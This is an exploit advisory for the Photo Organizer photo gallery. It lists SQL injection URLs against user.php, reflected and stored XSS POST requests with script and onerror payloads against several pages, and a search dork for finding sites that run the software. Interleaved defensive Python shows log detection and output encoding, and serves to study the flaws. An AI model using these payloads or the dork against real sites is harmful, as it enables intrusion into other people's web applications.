
Photo Organizer - XSS and SQL Vulnerabilities

Author: Rednofozi, Published: 10-09-2018
[+] Title :- Photo Organizer - XSS and SQL Vulnerabilities
[+] Date :- 2018-09-10
[+] Exploit Author :- Rednofozi
[+] Vendor Homepage :- http://po.shaftnet.org/
[+] Version :- All Versions
[+] Software Link :- http://po.shaftnet.org/#download
[+] Tested on :- Linux - Windows
[+] Category :- webapps
[+] Google Dorks :- intext:"Powered by Photo Organizer"
[+] Team name :- Anonysec.org
[+] Official Website :- none :d
[+] Contact :- Rednofozi@yahoo.com



=========================================================


########################################################

0x01# ~ Introduction
====================
At its most basic level, Photo Organizer is (yet another) multiuser web-based photo gallery engine. It differentiates itself by focusing on asset management, aiming at the needs of professional photographers rather than the more typical “I need to share some images on the web and blog about it” crowd. It does not make the assumption that just because you have an image, you want to share it with someone. It combines “we'd like to show people some photos” with “we have a lot of photos we just store and annotate.”
To that end, Photo Organizer is highly scalable, capable of handling tens of thousands of images with ease. Coupled with robust importing, exporting, searching, tagging, and printing capabilities, it is intended to act as a photographer's primary image repository.

0x02# ~ Exploitation
====================

1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
0 [+] Boolean SQL Injection & Blind [+] 0
1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1

http://site.com/user.php?user=1 and 1=2
http://site.com/user.php?user=1 union select 1,2--
http://site.com/user.php?user=-1 OR 17-7=10
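All three requests above put something other than a plain number into `user`, so a strict allow-list on that parameter both blocks them at the handler and makes them easy to find in logs. The following is an added example, not code from Photo Organizer or from the advisory author; it assumes `user` is a numeric ID, and the log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (addresses and timestamps are made up); the
# three flagged query strings are the URL-encoded test requests listed above.
SAMPLE_LOG = """\
198.51.100.2 - - [10/Sep/2018:10:00:01 +0000] "GET /user.php?user=1 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Sep/2018:10:00:07 +0000] "GET /user.php?user=1%20and%201=2 HTTP/1.1" 200 812
203.0.113.9 - - [10/Sep/2018:10:00:09 +0000] "GET /user.php?user=1%20union%20select%201,2-- HTTP/1.1" 200 5120
203.0.113.9 - - [10/Sep/2018:10:00:12 +0000] "GET /user.php?user=-1%20OR%2017-7=10 HTTP/1.1" 200 5120
198.51.100.2 - - [10/Sep/2018:10:01:30 +0000] "GET /login.php HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[0-9.]+"')
ID_RE = re.compile(r"[0-9]{1,10}")  # ASCII digits only, bounded length


def is_valid_user_id(raw):
    """Allow-list check a handler could apply before building any query."""
    return ID_RE.fullmatch(raw) is not None


def flag_requests(log_text):
    """Return (client, decoded value) for user.php hits with a non-numeric id."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/user.php"):
            continue
        # parse_qs percent-decodes, so the check sees what the application sees
        for value in parse_qs(url.query, keep_blank_values=True).get("user", []):
            if not is_valid_user_id(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in flag_requests(SAMPLE_LOG):
        print(f"{client}  suspicious user= value: {value!r}")
```

The allow-list is input validation only; the query itself should still bind the value as a parameter rather than concatenate it into SQL.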

1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
0 [+] Reflected XSS Cross Site Scripting [+] 0
1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1

Affected path(s):
login.php
search.text.general.php
login.php?operation=get_email
register.php

========================== HTTP REQUEST XSS 1 ==============================
Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Referer: http://site.com/login.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
POST: operation=login&username='"><img+src=x+onerror=prompt(1337);>&password=&auto_login=on&x=0&y=0

XSS Proof Image: http://i.imgur.com/VmbmuiZ.png
============================================================================


========================== HTTP REQUEST XSS 2 ==============================
Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Referer: http://site.com/search.text.general.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
POST: search_string='"><script>alert('1337')</script>&search_type=&current_user=all&x=0&y=0

XSS Proof Image: http://i.imgur.com/PDcO50Y.png
============================================================================


========================== HTTP REQUEST XSS 3 ==============================
Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Referer: http://site.com/login.php?operation=get_email
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
POST: operation=send_info&email='"><script>alert('1337')</script>&x=0&y=0

XSS Proof Image: http://i.imgur.com/MFc5unu.png
============================================================================


========================== HTTP REQUEST XSS 4 ==============================
Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Referer: http://site.com/register.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
POST: username='"><img+src=x+onerror=prompt(1337);>&password_1=&password_2=&first_name=&last_name=&email=&url=&phone=&company=&address1=&address2=&city=&zipcode=&state=null&country=null&x=0&y=0

XSS Proof Image: http://i.imgur.com/7T4WZMW.png
============================================================================


1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
0 [+] Persistent XSS Cross Site Scripting [+] 0
1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1

Affected path(s): album.add.php?parent=

========================== HTTP REQUEST XSS 5 ==============================
Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Referer: http://site.com/album.add.php?parent=
Cookie: po_session_id=701cc0e40cd083390368f49206b4ccbd
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
POST: album_caption='"><script>alert('1337')</script>&parent=null&album_access_rights=3&album_description=&x=0&y=0

XSS Proof Image: http://i.imgur.com/TrzBqXJ.png
============================================================================
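Every request above starts its value with `'">`, which closes an HTML attribute and its tag when the value is echoed back unencoded; the stored case (XSS 5) differs only in that the echo happens on a later page view, so the same encoding is needed at output time. The following is an added example, not code from Photo Organizer or from the advisory author: it decodes two of the POST bodies shown above, renders them into a hypothetical `<input>` template with and without encoding, and uses Python's `html.parser` as a stand-in for a browser parser to show which elements result.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# POST bodies taken from HTTP REQUEST XSS 1 and XSS 2 above.
BODIES = {
    "username": "operation=login&username='\"><img+src=x+onerror=prompt(1337);>"
                "&password=&auto_login=on&x=0&y=0",
    "search_string": "search_string='\"><script>alert('1337')</script>"
                     "&search_type=&current_user=all&x=0&y=0",
}


def field_value(field):
    """Decode the form body as the server would and return one field."""
    return parse_qs(BODIES[field])[field][0]


def render(field, value, encode):
    """Echo a submitted value back into a form field (hypothetical template)."""
    if encode:
        value = escape(value, quote=True)  # encodes & < > " '
    return f'<input type="text" name="{field}" value="{value}">'


class _Audit(HTMLParser):
    """Record every start tag, with its attributes, that the parser sees."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse(html):
    audit = _Audit()
    audit.feed(html)
    audit.close()
    return audit.tags


def injected(html):
    """Markup beyond the single <input>: extra tags and on* handlers."""
    found = []
    for tag, attrs in parse(html):
        if tag != "input":
            found.append(tag)
        found += [f"{tag}@{a}" for a in attrs if a.startswith("on")]
    return found
```

With encoding on, the parser sees one `<input>` whose `value` round-trips to the submitted string, so the user still sees what they typed while no new element is created.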

--------------------------------------------------------------------------------------------

#######################################################
Anonysec hacker iranin
########################################################

=======================================================
# Discovered by : Rednofozi


#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
